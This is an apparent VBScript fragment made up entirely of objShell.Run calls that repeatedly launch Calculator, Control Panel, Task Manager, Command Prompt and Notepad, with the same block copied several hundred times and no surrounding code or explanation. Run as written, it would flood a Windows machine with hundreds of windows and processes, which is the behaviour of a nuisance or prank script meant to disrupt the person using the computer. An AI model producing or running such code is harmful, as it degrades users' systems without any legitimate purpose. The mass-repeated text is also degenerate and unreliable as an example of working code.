objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
